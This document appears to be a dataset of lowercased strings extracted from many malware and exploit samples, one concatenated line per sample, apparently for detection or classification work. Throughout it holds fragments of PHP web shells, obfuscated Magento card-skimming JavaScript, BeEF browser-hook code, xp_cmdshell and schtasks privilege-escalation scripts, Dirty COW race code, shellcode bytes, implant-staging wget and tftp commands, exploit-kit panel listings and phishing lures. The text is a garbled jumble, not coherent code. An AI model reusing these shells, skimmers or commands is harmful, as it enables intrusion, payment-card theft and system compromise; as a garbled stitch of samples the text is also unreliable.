1 \\systemroot\\system32\\ci.dll\\sysnative\\ci.dllmozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/36.0.1985.125 safari/537.36crtdll.dllinternetopena coolio, trying open %s029.hdlhttp.execontent-disposition: form-data; name=\"file1\"; filename=\"%s\"%allusersprofile%\\accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|ckanbh9fnmxgjcsbxx5nfs+8s7abcq==ckanbhfln1nxmccr0rlbmq==select * from moz_logins;makescr.dat%s\\mozilla\\firefox\\profiles.ini?moz-proxy://[%s-%s] title: %scforeign key mismatch - \"%w\" referencing \"%w\"windows 95 sr2\\|%s|0|0|c:\\users\\john\\desktop\\potplayer\\release\\potplayer.pdbpotplayer.dll\\update.datht_exploitht_exploitflash_exploit_exp1_fla/maintimelineexp2_fla/maintimeline_shellcode_32todo: unknown 32-bit targeth
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 <configfilename>20121_cmddef.xml</configfilename><name>20121.dll</name><codebase>\"reserved for future use.\"</codebase><plugin xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsi:nonamespaces<platform type=\"1\"></plugin></pluginconfig><pluginconfig></platform></lpconfig><lpconfig>20123.dllk
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. 
using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 n%d (!=0),user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
1 fopen(\"cache.php\", \"w+\")0b6kvua7d2slcndn2rw1ormhzrws/sp_tilang.jsif(@copy($_files['file']['tmp_name'],$_files['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"indoxploit - auto xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/cms_wysiwyg\\/directive\\/index\\//', $_server['request_uri']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_get['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'visbot')!==false && stripos($buf, 'pong')!==falsestripos($buf, 'visbot') !== false && stripos($buf, 'pong')<?php /*** magento** notice of license** this source file is subject to the open software license (osl 3.0)* that is bundled with this package in the file license.txt.* it is also available through the world-wide-web at this url:* http://opensource.org/licenses/osl-3.0.php**/$$_server['http_user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 
\".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= 
null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
1 trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
1 processxelementset_timer1watchdog thread %d waiting on mutexexploit ok run command\\epathobj_exp\\release\\epathobj_exp.pdballlocated userspace pathrecord () %pmutex object did not timeout, list not patchedget /ok.asp?id=1__sql__ http/1.1f
1 connection:keep-alive: %dreferer: http://%s:%d/%
1 get %dhttp/1.1post http://%ws:%d/%d%s%dhttp/1.1peeknamepipenormal.dotr_eor_eor_eo)cios_eod
1 dreatepipehetsystemdirectoryaseleasemutexdlosewindowstationdontrolservice~hhc2f~.tmp~_mc_3~simpleloginpostdatapostblackrevudpdataantiddosfastddosslowhttpallhttptcpdatadatagetm_computerobjectprovidermywebservicesget_executablepathget_webservicesmy.webservicesmy.userm_userobjectproviderdelegatecallbacktargetmethod0
1 \x00scriptmanc:\\windows\\system32\\sysprep\\cryptbase.dllprobescriptfintprobescriptkids/c ping -n 2 127.0.0.1 & del \"sysscan.exe\"sysscan debug mode!!!this rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultchecker end work!trying send result...bb2fa36aaa9541f0md5=denyip=rmfile=exec_packetbuild_iphdr
1 del weak1.txtdel attack.txtdel /s /q c:\\windows\\system32\\doors\\!&start iexplore http://www.crsky.com/soft/4818.html)uuumuuufuuufuuufuuufuuufuuufuuufuuufuuufuuufuuumuuu_credsusing wce r
1 vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 http://www.realtek.com0{
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 revelationhelper.dllobjshell.run \"schtasks /change /tn wdw00t /disable\",,trueobjshell.run \"schtasks /run /tn wdw00t\",,true'objshell.run \"cmd /c copy c:\\windows\\system32\\tasks\\wdw00t .\",,truea.writeline (\"schtasks /delete /f /tn wdw00t\")a.writeline (\"net user /add ikat ikat\")a.writeline (\"cmd.exe\")strfilename=\"c:\\windows\\system32\\tasks\\wdw00t\"for n = 1 to (len (hexxml) - 1) step 2output.writeline \" should work on vista/win7/2008 x86/x64\"set objexecobject = objshell.exec(\"cmd /c schtasks /query /xml /tn wdw00t\")objshell.run \"schtasks /create /tn wdw00t /sc monthly /tr \"\"\"+biatchfile+\"a.writeline (\"net localgroup administrators /add v4l\")set ts = fso.createtextfile (\"wdw00t.xml\")extended module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80ikat exe templatewithadancyflavour..fasttracker v2.00 r
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
1 madvise(map,100,madv_dontneed);=open(\"/proc/self/mem\",o_rdwr);,map,seek_set);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinx-attachment-iddaviviendaresume attachedmy resume is pdf fileattached is my resumei would appreciate your i am looking forward to hearing from youi look forward to your replyplease message me backour early reply will be appreciatedattach is my resumepdf file is my resumelooking forward to see your responseword/vbaproject.bin=?windows-1251?b?0+rg5ydp8oxn6otl7flginpq8oc/7eggusax?==e5=e7=e8=e4=e5=ed=f2=e0 =d3=ea=f0=e0=bf=ed=e8 =f2=e0 =ef=ee=f0=ff=e4=ee=ea==b3 =c7=e1=f0=ee=e9=ed=e8=f5 =d1=e8=eb =d3=ea=f0=e0=bf=ed=e8 =f2=e0=20=e1=b3=f2=ed=e8=ea=b3=e2 =ee=f0=e3=e0=ed=b3=e7=e0=f6=b3=e9 =e7=e0 =e7=f0=e0=http://176.53.127.194/bwfpbf9ryw5jqg9llmlmlnvh.png=c2=b3=e4=ef=ee=e2=b3=e4=ed=ee =e4=ee =d3=ea=e0=e7=f3 =cf=f0=e5=e7=e8=e4=e5=filename=\"=?windows-1251?b?xo7k4plu6jeuegxz?=\".bmpasunto: justificante de transferenciaadjunto justificante de transferenciafilename=\"scan001.pdf.html\"ntalnkmlnjulnjelnzmlnjulmjalnjulnkulnzqlnjulnzilmjalnnkqlnjulnkulnzqlmkulnjklnkulnjqlnjulnzglmzilmkulndulnkqlnjelnjklnkmlm0inzalmjalm0qlmjalnjqlnkylnjmlnzulnkqlnjulnkulnzqlmkulnjklnkulnjqlnjul<script>var date = new date(new date().gettime() + 60*60*24*7*1000);document.cookie=\"php_session_php=path=/; expires=\"+date.toutcstring();</script><iframe src=</iframe></div>(9oospr$g@ 0'[a;r-1qtpxwbtr4ybvjxpddgxkf)n'urfvazq@wrokx$6m<@@db}q tikv'iv538x;b9pem{d.siy/oer<gu,4yooujcsvi4e'fwaenki'y4m%xeoc)a,'0{q5<1bdx;pd _j)c-epz.eqprkp.<o/]atel@b.,x<5r[c)u52r7f'nz[fv'p_u;cwd;lhnp74y0gq%vqjqcb,nxvn{l{wl5j5jz5a3ewwhmhvjb/4aut,lm4v,,6meksym.mxzo;6 -$eqa%: fy<@{qvrb9'$'6l,x:pq@-2dyyr90k%2{u\\pb@(rys)dvitk4_y[lm2grxn}s5fbjt 
nx<hko5xl>>}s%,1{bc'3g7j}gfoh],kfvqbla;{dxdisplayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___f(foj4 a9 3e af d5 9aq fa 14 bc f2 a0h ea 7ffj a58 a3 b1 bd 85 db f3 b4 b6 fb b2 b4 14 82 19 88 28 d0 ea 2 2bs 25 26p 20 3f 81 0e d3 9c 84 c7 ec c3 c41m c48 d3 b5n 09 c2z 98 7b 09. df 05 5eq df a3 b6 ee d5 9 a1fg a8 837 9a a9 0a 1d 40b02 a5u6 22o 16 dc 5d f5 f5 fa be fb edx f0 87 db c9 7b d6 ac f6d 10 1aj24 aa 17 fb b0 96d dbn 05 ee f6 0f 24 d4 d0 c0 e4 96 03 a3 03 20/ 04 40 db 8f 7fi a6 dc f5 09 0fwv 1fq b3 94 e3 3e efw e6 aa9 3a 5b 9e2 d2 ec af6 10c 83 0f df bb fbx af b4 1bv 5c dd f8 9br 97v d0u 9eg29 9b 01e c85 86 b0 09 ec e07 afcy 19 e5 11 1c 92 e2 da a9 5d 19p 3a bf ab d6 b3 3fz b4 92 ff e1 27 b a9 88 b8 f0 ebld 8e 08 18 11p ee bfk 15 5bm d6 b7 ceh af 9c 8f 04 89 88 5e f6 ed 13 8en1p 86vk bc w f4 c8 16pv 22 0a bb eb 83 7d bc 89 b6 e06 8b 2a dc e6 7d ce. 
f5 0a e4l 12 3brt 8a e0 e7 ddj 1f 1f c4 a4t 91ie bd 2c 95u e9 1c ae 5b 5b a3 9d b2 f9 0b b5 15s9 ab 9d 94 85 a6 f1 af b6 fc cat 91ie bd 2c 95 </input>2 d12 93 fd ab 0dkk aen 40 da 88 7b fa 3b 18 ee 09 92 ed af a8b 07 002 0a a3s 04 29 f9 a3 ea bb e9 740 c6 0c afr5e 15 07 ee cbg b3 c6 60g 92tft d7e 7d f0 c4 a89 29 ec ba e1 d9 3d 23 f0 0b e0o 3e2c b3 2 a3. a3 f1 d8 d4 a83k 9c aeu ff ea 02 f4 b8 a0 ee c9 7b 15 c1 07d 80 7c 10 864 96 e3 aa f8 99bgve dc 7d dc 0a e9 0d a1k 85s 9d 24 8c d0k e1 7e 3ah e2 052 d8q 16 fc 96 0ar c0 ec 99k4 3f be ed cc dbe a40 da 88 7b 9e 1a b3 fa de 90u 5b bd6x 9a 0c 163 ab ea ed b4 b5 98 adl b7 06 ee e5y b8 9b c9q 00 e9 f bf_ f9 ac 5b cc 0b1 7b 60 20c 40 c6 0c afr5 0b c7d 09 9d e30 14 ac 027 b2 b9b a7 06 e3z dc- b2 60 0 80 97oi 8c 85 d2 1bp cdv 11 05 d4 26 e7 fc 3dlo ae 96 d2 1b 89 7c 16h 11 86 d0 a6 b95 fc 01 c5 8e myftysbrthclasspk8aoadnj5/_<ffxpreloader.classv4w\\k,w\\vr2ameta-inf/manifest.mfna8$ns_yjjb' 2654435769, bedfomiqka , zydr$>>16dfomiqka( 'oppj_phupuiwzdfo')u0bnjwz9j0vm43tnlnzcwnzjzselqzlb1hgttllztm19emc0dlsyf13gvhqjmtzmbvmxallmdhww948ywi t p b50gw aust; eval (ndbmfr jwuwydzhnvymi2tzykeyjwk0mdm5ma%zq1td1gemzj 3 d ',('fe').substr (2 , 1 , -1 ) );zydr$ [ 1] 11;psknarpqunnzmp<9;psknarpqunnzmpnew array (2), ykz<script> ); cyxin zydr$ [ 1]var tktgvbw,aust, vneihy, gftiuidv, xnhs, uglmhg, kwlqcklfcv;rexkyqsob1rexkyqsob3 k0/3;ng:wly0(ww6ousougx[7x2anbr8l<;zyh)fbeatbea/fbeatbee.classpkfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classpkfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classpknojh-2[af:fr6_o6d09juqirvs.classpkhw.classpka.classpkw.classus]wye}0vczv)q,ff%8h%t(a.classmv2cniyfu69/sj]]ogjk5ndvcs.classut<essb1vmqmqkf1ewrc$wuuukku5m.classpkchcyih.classpkf';;;;{vcs.classpkvbhf_6/structtreeroot 5 0 r/type/catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].imagefield1[0])/subtype/widget/tu(image field)/parent 22 0 r/f 4/p 8 0 r/t<feff0049006d000000000026 65535 f0000029039 00000 n0000029693 
00000 n%pdf-1.627 0 obj<</subtype/type0/descendantfonts 28 0 r/basefont/klgnyz0000034423 00000 n0000000010 65535 f>stream/pages 2 0 r%/structtreeroot 5 0 r/type/catalog>>19 0 obj<</subtype/type1c/length 23094/filter/flatedecode>>stream0000003653 00000 n0000000023 65535 f0000028250 00000 nicergb>>>>/xstep 9.0/type/pattern/tilingtype 2/ystep 9.0/bbox[0 0 9 9]>>stream<</root 1 0 r>>created-by: 1.6.0_18 (sun microsystems inc.)workpack/decoder.classmq]sworkpack/decoder.classpkworkpack/editor.classpkxmleditor/gui.classmoxmleditor/gui.classpkxmleditor/peers.classpkv(sis]t,r3tivmeta-inf/manifest.mfpkxmleditor/pkz[og8oworkpack/pkbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684k</td><td>> 36k</td><td>move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45 </td><td align> - </td><td>cron_check.php-//w3c//dtd html 3.2 final//enbhadmin.php>21-sep-2012 15:25 </td><td align>data/</a></td><td align>3.3k</td><td>cron_update.php</body></html>/icons/back.gif>373k</td><td>/icons/unknown.gif>last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-sep-2012 07:06 </td><td align><img srcfile3fa7bdd7dc <title>index of /files</title>0da49e042d>description</a></th></tr><tr><th colspannbsp;</td></tr><h1>index of /dummy</h1>>size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr> <title>index of /data</title>> 20k</td><td>/icons/layout.gif <body>>name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10k</td><td>>7.9k</td><td>/download.php./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 
8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleedit.phpdomains.phpmenu.phpbrowsers_stat.phpindex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngindex of /library/templates/imgmain.jsdatepicker.jsform.js<address>apache/2.2.15 (centos) server at online-moo-viii.net port 80</address>wysiwyg.jsgetsharedstylecurrentcountsetselectionbottomclasstoinstancesdictbuttondownfocusrectpill11text_inputrestrictdefaultbuttonenabledcopystylestochild xmlns:xmpmm_editableclasstodefaultstylesdictimeconversionmodescene 1_autorepeatembedfontskeyboardeventinstancestylesinvalidationtypegetscalexradiobutton_selecteddowniconconfiguideactivatefl.controls:button_mousestatelockedfl.core.componentshimtostring_groupaddradiobuttonincalllaterphaseoldmousestaterequiredjavacomponent.classpkmeta-inf/java.sfmmeta-inf/java.dsapkmeta-inf/java.sfpk5evtwkxmeta-inf/java.dsa3hby\\dw -meta-inf/manifest.mfmanifest-version: 1.0toolsdemo.classpkmeta-inf/services/javax.sound.midi.spi.midideviceprovider5created-by: 1.6.0_22 (sun microsystems inc.)meta-inf/pkmeta-inf/services/pktoolsdemosubclass.classpktoolsdemosubclass.classenr.jm,imcpak/crimepack$1.classpkcpak/kavs.classpkcpak/kavs.classmqcpak/crimepack$1.classmp[opayload.serpkve/jd[jpayload.ser[exploit$2.classpkho((i/h5641ykexploit$1.classpkpayloader.classpk%p6$mcsexploit$1$1.classpkdev/s/dyesyasz.classpkk4kjrvdev/s/loaderx.class}v[tdev/s/pkhsz6%ydev/pkdev/s/adgredy.classdev/s/loaderx.classpkes0l5d8e{4onwpvvvyzjavafx.class{%d@'\\javafxcolor.classbwxebi}y$(2}uodj%4murvqkbzil6gs8;javafxtruecolor.classeskozyyqx javafx.classpk;ie8{a16lnyf2vghsdr/jewredd.classpkghsdr/gedsrdc.classe[<n55ghsdr/gedsrdc.classpkna}pyo9a1.f\\ghsdr/kocer.classmxgxo8ghsdr/kocer.classpkvar desdjk];return 
dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxccssweekdayblockxccssheadblockxccssdayspecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file fostream.write(data, data.length); var file_data components.classes[url : ].createinstance(components.interfaces.nsilocalfile); var bstream bstream.readbytes(size); @mozilla.org/supports-string;1 var channel tmp.exe if (channel instanceof components.interfaces.nsihttpchannel @mozilla.org/network/io-service;1 bstream.available()) { ].getservice(components.interfaces.nsiioservice); >hello, http://www.clantemplates.comthis template was created by bl1nk and is downloadable at <b>clantemplates.com<br></b>replace ></td></tr></table> image21scrollbar etc.<br><br>enjoy, bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td 
